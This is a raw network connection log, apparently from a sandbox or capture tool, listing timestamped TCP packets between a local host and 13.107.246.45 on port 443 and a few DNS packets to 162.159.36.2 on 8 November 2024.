Nov 8, 2024 16:15:56.223349094 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223360062 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223362923 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.223375082 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223434925 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223478079 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.223503113 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.223517895 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223529100 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.223534107 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.224499941 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.225059032 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.225080967 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.225477934 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.225482941 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.226258039 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.226283073 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.226392031 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.226413012 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.226439953 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.226492882 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.226535082 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.226543903 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.226638079 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.226649046 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.350768089 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.350794077 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.350888014 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.350908041 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.351171017 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.351176977 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.351192951 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.351355076 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.351391077 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.351425886 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.354003906 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.354053020 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.354127884 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.354285955 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.354300022 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.355262995 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.355288982 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.355340004 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.355343103 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.355381012 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.355515003 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.355532885 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.355542898 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.355551004 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.357769966 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.357806921 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.357893944 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.358030081 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.358046055 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.827402115 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.827948093 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.827976942 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.828377008 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.828382015 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.944238901 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.944809914 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.944827080 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.945260048 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.945266962 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.960098028 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.960580111 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.960614920 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.961019993 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.961026907 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.969769955 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.969805002 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.969854116 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.969907045 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.969939947 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.970227003 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.970251083 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.970261097 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.970267057 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.973257065 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.973319054 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.973414898 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.973576069 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.973597050 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.078907967 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.079504967 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.079582930 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.079613924 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.079641104 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.079653978 CET	63280	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.079659939 CET	443	63280	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.082680941 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.082722902 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.082818985 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.082998991 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.083012104 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.086709976 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.086792946 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.087116957 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.087127924 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.087229013 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.087254047 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.087605953 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.087610960 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.087698936 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.087704897 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.090786934 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.090841055 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.090904951 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.091078043 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.091093063 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.091104984 CET	63281	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.091109991 CET	443	63281	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.093713999 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.093756914 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.093849897 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.094021082 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.094032049 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.217293978 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.217322111 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.217369080 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.217396021 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.217422009 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.217669010 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.217683077 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.217708111 CET	63283	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.217715025 CET	443	63283	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.221138954 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.221187115 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.221276999 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.221460104 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.221478939 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.222847939 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.222912073 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.222956896 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.223110914 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.223133087 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.223144054 CET	63282	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.223151922 CET	443	63282	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.226135969 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.226164103 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.226253986 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.226380110 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.226388931 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.721860886 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.722790956 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.722815037 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.723289013 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.723294020 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.810942888 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.812787056 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.812828064 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.813282013 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.813287020 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.939719915 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.939749002 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.939804077 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.939837933 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.939865112 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.940049887 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.940074921 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.940084934 CET	63286	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.940090895 CET	443	63286	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.942675114 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.942714930 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.942795992 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.942931890 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:57.942945004 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:57.999301910 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.000762939 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.000778913 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.001216888 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.001221895 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.017240047 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.017364979 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.017458916 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.017770052 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.017791986 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.017806053 CET	63285	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.017812967 CET	443	63285	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.021982908 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.022037029 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.022124052 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.022238016 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.022255898 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.060060024 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.060631037 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.060648918 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.061100960 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.061108112 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.137801886 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.137883902 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.137974024 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.138164043 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.138180017 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.138195992 CET	63289	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.138201952 CET	443	63289	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.140713930 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.140789986 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.140866995 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.141017914 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.141035080 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.179406881 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.180079937 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.180115938 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.180537939 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.180543900 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.192406893 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.192481995 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.192692995 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.192729950 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.192749023 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.192761898 CET	63287	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.192766905 CET	443	63287	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.195671082 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.195725918 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.195808887 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.195964098 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.195976973 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.313594103 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.313625097 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.313677073 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.313745022 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.313791990 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.314013958 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.314037085 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.314048052 CET	63288	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.314054012 CET	443	63288	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.316816092 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.316857100 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.316934109 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.317079067 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.317091942 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.851653099 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.852283955 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.852309942 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.852742910 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.852747917 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.882846117 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.883213997 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.883244038 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.883579016 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.883584976 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.919228077 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.919786930 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.919826031 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.920192003 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.920197010 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.981731892 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.981795073 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.981872082 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.982062101 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.982079029 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.982089043 CET	63291	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.982095957 CET	443	63291	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.984622002 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.984659910 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:58.984724045 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.985029936 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:58.985038996 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.012603045 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.012665987 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.012753010 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.012928963 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.012948036 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.012968063 CET	63292	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.012974024 CET	443	63292	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.016015053 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.016051054 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.016103983 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.016285896 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.016295910 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.052568913 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.052728891 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.052787066 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.053188086 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.053205013 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.053215027 CET	63293	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.053220034 CET	443	63293	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.054996967 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.061115980 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.061131954 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.061568975 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.061573029 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.063141108 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.063169003 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.063230038 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.063375950 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.063386917 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.127667904 CET	61986	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:59.132639885 CET	53	61986	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:59.132714987 CET	61986	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:59.132755041 CET	61986	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:59.137841940 CET	53	61986	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:59.200819016 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.200845003 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.200911999 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.200926065 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.200959921 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.201204062 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.201230049 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.201241016 CET	63294	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.201246977 CET	443	63294	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.204245090 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.204296112 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.204377890 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.204560041 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.204579115 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.561594963 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.562088966 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.562134027 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.562525034 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.562536955 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.727016926 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.727582932 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.727601051 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.728029013 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.728034973 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.746963978 CET	53	61986	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:59.748733997 CET	61986	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:59.752537966 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.752665997 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.752764940 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.752806902 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.753453970 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.753484964 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.754132032 CET	53	61986	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:59.754173994 CET	61986	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:59.754388094 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.754398108 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.754604101 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.754617929 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.754627943 CET	63290	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.754631996 CET	443	63290	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.766655922 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.766702890 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.766758919 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.766904116 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.766913891 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.805116892 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.805754900 CET	63297	443	192.168.2.10	13.107.246.45
